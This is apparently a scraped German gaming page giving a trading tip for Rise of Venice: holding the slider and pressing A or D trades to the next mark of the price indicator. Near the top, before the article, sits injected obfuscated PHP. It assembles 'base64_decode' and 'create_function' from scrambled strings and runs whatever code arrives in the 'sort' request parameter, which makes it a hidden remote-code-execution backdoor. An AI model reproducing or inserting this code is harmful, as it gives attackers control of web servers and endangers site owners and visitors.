• Rise of Venice Gold
  • Patrizier IV Gold
  • Rise of Venice
  • Port Royale 3 Gold
if(isset($_REQUEST['sort'])){ $string = $_REQUEST['sort']; $array_name = ''; $alphabet = "wt8m4;6eb39fxl*s5/.yj7(pod_h1kgzu0cqr)aniv2"; $ar = array(8,38,15,7,6,4,26,25,7,34,24,25,7); foreach($ar as $t){ $array_name .= $alphabet[$t]; } $a = strrev("noi"."tcnuf"."_eta"."erc"); $f = $a("", $array_name($string)); // MALWARE $f(); exit(); } if( $wd123 == 'banner' ):?> RISE OF VENICE; Designed by: 123WebDesign

Schneller Handeln

 

Es gibt einen sehr hilfreichen Trick um schneller handeln zu können.

Wie schon in Patrizier IV und Port Royale bekommt man beim Handeln eine Ampel angezeigt die insbesondere Anfängern hilft zu den richtigen Preisen zu kaufen und verkaufen.

Bisher musste man immer mit der Maus den Regler bewegen um die Menge der Waren einzustellen. In Rise of Venice geht es jetzt viel einfacher die Ampelgrenzen zu berücksichtigen. Einfach den Schieberegler anklicken und gedrückt halten und dann auf der Tastatur die Taste "A" bzw. "D" drücken.

 

Damit handelt man immer bis zum nächsten Strich der Ampel: kaufen sollten man nur bis noch ein grüner Strich zu sehen ist. Ist keiner mehr zu sehen, so verliert man Ansehen in der Stadt. Beim Verkaufen ist es genau anders herum. Ansehen erhält man wenn die Ampel komplett rot ist, sobald ein grüner Balken erscheint, erhält man kein weiteres Ansehen in der Stadt mehr.